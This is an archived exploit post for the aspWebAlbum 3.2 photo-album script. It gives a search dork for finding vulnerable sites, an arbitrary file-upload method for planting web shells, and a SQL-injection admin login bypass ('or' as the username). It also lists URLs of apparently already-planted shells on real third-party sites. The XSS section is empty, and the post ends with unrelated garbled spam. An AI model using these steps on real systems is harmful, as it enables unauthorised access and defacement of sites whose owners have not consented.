SecurityvulnsSECURITYVULNS:DOC:20466aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities
##################################################################################################
#-# Discovered bay Alemin_Krali <<<<<<<<====
#-# aspWebAlbum 3.2 # # #### ## ##
# # # # # # # #
#-# Script Download "http://www.fullrevolution.com" ##### # ### # # # #
# # # # # # #
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) # # ### #### # #
#-# HomePage al3m.blogspot.com
#-# Dork ? : album.asp?pic= .jpg cat=
########################################################################
#
# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
########################################################################
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!
and your shell adress:
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp
ex:1
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp
ex:2
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/
Ablaze rally 9-24-06/pics/klasvayv.asp
########################################################################
#
# 2-Admin Bypass [AspWebAlbum 3.2] #
########################################################################
http://site.com/path/album.asp?action=login
ASP/MS SQL Server login syntax
Username:'or'
Password:anything
########################################################################
#
# 3-Xss Vulnerability [AspWebAlbum 3.2] #
########################################################################
#################################################################################################
Windows Live Messenger'эn iзin Ьcretsiz 30 Эfadeyi yьkle
http://www.livemessenger-emoticons.com/funfamily/tr-tr/